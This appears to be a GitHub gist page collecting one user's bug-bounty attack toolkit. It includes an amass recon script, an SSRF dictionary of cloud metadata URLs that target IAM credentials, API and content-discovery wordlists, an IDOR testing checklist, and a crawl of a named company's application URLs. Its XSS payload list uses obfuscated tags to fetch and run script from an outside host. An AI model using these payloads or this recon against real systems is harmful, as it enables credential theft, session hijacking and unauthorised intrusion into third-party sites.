UYavuz Uyavuz24
@Uyavuz24
Uyavuz24 / amass_asn_test.sh
Last active August 5, 2020 12:28
amass asn intel test script
#!/bin/bash
# ASNs to query, one amass intel run per ASN
asnlist=(59055 59054 59053 5905 259051 59028 45104 45103 45102 45096 37963 34947 134963)
for i in "${asnlist[@]}"; do
  echo "searching $i"
  amass intel -active -asn "$i" -p 80,4443,2075,2076,6443,3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,10000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7077,4040,9000,8089,443,744
done
@Uyavuz24
Uyavuz24 / cloud_metadata.txt
Last active September 21, 2020 06:08 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@Uyavuz24
Uyavuz24 / hostsbyasnname.py
Created August 6, 2020 08:34 — forked from ziot/hostsbyasnname.py
Get hosts by ASN->CIDR->Hosts via company name
import requests, json
from requests.packages.urllib3.exceptions import InsecureRequestWarning, InsecurePlatformWarning, SNIMissingWarning
from bs4 import BeautifulSoup

# silence urllib3 TLS warnings for the requests made below
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
requests.packages.urllib3.disable_warnings(SNIMissingWarning)

# another source of CIDRs by ASN
def getIPCidrs(asn):
    pass  # function body is cut off in this gist preview
@Uyavuz24
Uyavuz24 / api_wordlist.txt
Last active March 22, 2024 13:34
api wordlist
/2
/graphql-proxy/admin
/3.0/
/3ds_callback
/3ds_update_payment_callback
/accounts
/active
/activity
/actuator
/actuator/auditevents
@Uyavuz24
Uyavuz24 / API Checklist
Last active August 8, 2023 19:33
Our checklist for testing APIs
* If the wordlist can't find anything on the API, use hakrawler
* Every domain could have an API. Add a JSON extension to endpoints and see the response
* If IDs are not numerical, try to find leaked IDs from other places (e.g. posts the user created, and other features)
* Some endpoints will return you a UUID as a response to an e-mail address etc.
* If there is no leak of the user ID, just swap it with the user ID of another account you created
* Look for permissions in every endpoint
* Change lowercase to uppercase or vice versa in endpoints
* After finding endpoints, run Arjun on them
* Use all HTTP request methods
* Look for IDORs in HTTP headers and body
@Uyavuz24
Uyavuz24 / apps.bentley.com.txt
Created August 20, 2020 09:33
wayback crawl
Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3650.0
http://apps.bentley.com:80/claimsviewerims
http://apps.bentley.com:80/claimsviewerims/default.aspx
http://apps.bentley.com:80/srmanager
http://apps.bentley.com:80/srmanager/AccountSRs
http://apps.bentley.com:80/srmanager/AccountSRs/SRList
http://apps.bentley.com:80/srmanager/Billing
http://apps.bentley.com:80/srmanager/Billing/ProblemArea
http://apps.bentley.com:80/srmanager/Billing/ProblemAreaContact
@Uyavuz24
Uyavuz24 / XSS payloads
Last active October 11, 2020 19:02
there are also descriptions
<iframe srcdoc='<script src=https://myeviljsbucket.s3.amazonaws.com/evilscript.js></script>'></iframe> //When CSP disallows inline JS but allows S3 buckets. The "<script>" tag doesn't work, but there is HTML injection!!
<svg/onload=alert(1)> //this is everywhere
<img src=x onerror=alert(document.domain)> //this is also everywhere
"><script src=https://ubey.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://ubey.xss.ht\';document.body.appendChild(a)') //For use where URIs are taken as input.
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> //For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute.
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> //Another basic payload for when <script> tags
@Uyavuz24
Uyavuz24 / discovery.txt
Last active December 8, 2022 23:57
content discovery
/
/*
/*.*
/*?
/*?*
/.../.../.../
/./
//
///
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
@Uyavuz24
Uyavuz24 / HTTP Headers
Created October 10, 2020 17:35
headers for injection
X-Forwarded-Host:
Host:
Referer:
X-Forwarded-For:
/
!
!=
&&
*
*&
*.*
*?
*?*
.../.../.../